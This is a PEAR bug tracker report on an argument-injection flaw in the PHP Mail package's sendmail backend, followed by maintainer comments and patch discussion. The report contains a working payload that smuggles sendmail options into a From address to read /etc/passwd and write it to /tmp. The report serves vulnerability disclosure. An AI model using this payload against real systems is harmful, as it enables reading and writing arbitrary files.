Package home | Report new bug | New search | Development Roadmap Status: Open | Feedback | All | Closed Since Version 2.0.0
Bug #16200 security hole allow to read/write Arbitrary File
Submitted: 2009-05-07 15:16 UTC
From: websec Assigned: davidc
Status: Closed Package: Mail (version 1.1.14)
PHP Version: 5.2.5 OS: linux
Roadmaps: (Not assigned)    
Subscription  


 [2009-05-07 15:16 UTC] websec (web sec)
Description: ------------ The mail package used escapeshellcmd function Incorrectly,so it may allow to read/write Arbitrary File Test script: --------------- <?php ini_set('include_path',ini_get('include_path').':/usr/local/lib/php/PEAR:'); require_once("Mail.php"); $from = "From: " . $_REQUEST['email'] . "\r\n"; $to = "xxxxxxx@zzzz.com"; $subj = "subscription request"; $body = "subscribe me"; $hdrs = array( "To" => $to, "Cc" => $cc, "Bcc" => $bcc, "From" => $from, "Subject" => $subject, ); $body="test"; $mail =& Mail::factory('sendmail'); $mail->send($to, $hdrs, $body); ?> test.php?1=3&email=xxxxx%09-C%09/etc/passwd%09-X%09/tmp/wokao%09zzz@x%09.com&l=2&1=3 Expected result: ---------------- this may read /etc/passwd and write it to /tmp/wokao Actual result: -------------- this may read /etc/passwd and write it to /tmp/wokao

Comments

 [2009-05-08 09:19 UTC] doconnor (Daniel O'Connor)
Looks like this is safe on windows.
 [2009-05-08 09:20 UTC] doconnor (Daniel O'Connor)
-Status: Open +Status: Critical
Bumping to critical for the moment.
 [2009-05-08 09:36 UTC] doconnor (Daniel O'Connor)
The following patch has been added/updated: Patch Name: quick-fix Revision: 1241757412 URL: http://pear.php.net/bugs/patch-display.php?bug=16200&patch=quick-fix&revision=1241757412&display=1
 [2009-05-08 09:37 UTC] doconnor (Daniel O'Connor)
Above patch adds in Validate and validates the from address is a valid email. This may not be correct behaviour. This may also still be exploitable by targetting different arguments.
 [2009-05-09 20:16 UTC] davidc (David Coallier)
-Assigned To: +Assigned To: davidc
 [2009-05-09 20:17 UTC] davidc (David Coallier)
-Status: Critical +Status: Closed
This bug has been fixed in CVS. If this was a documentation problem, the fix will appear on pear.php.net by the end of next Sunday (CET). If this was a problem with the pear.php.net website, the change should be live shortly. Otherwise, the fix will appear in the package's next release. Thank you for the report and for helping us make PEAR better. Could you guys please roll a release? Cheers.
 [2009-11-20 18:08 UTC] dnikolaenko (Dennis P. Nikolaenko)
Please request a CVE identifier for this bug to be noticed in Linux distros.
 [2009-11-21 13:19 UTC] rgeissert (Raphael Geissert)
The fix is incomplete, $recipients also needs to be properly escaped. - $recipients = escapeShellCmd(implode(' ', $recipients)); + $recipients = implode(' ', array_map('escapeshellarg', $recipients));
 [2010-01-05 15:26 UTC] alec (Aleksander Machniak)
-Status: Closed +Status: Open
 [2010-02-08 13:01 UTC] doconnor (Daniel O'Connor)
-Status: Assigned +Status: Closed
This bug has been fixed in SVN. If this was a documentation problem, the fix will appear on pear.php.net by the end of next Sunday (CET). If this was a problem with the pear.php.net website, the change should be live shortly. Otherwise, the fix will appear in the package's next release. Thank you for the report and for helping us make PEAR better. [294744]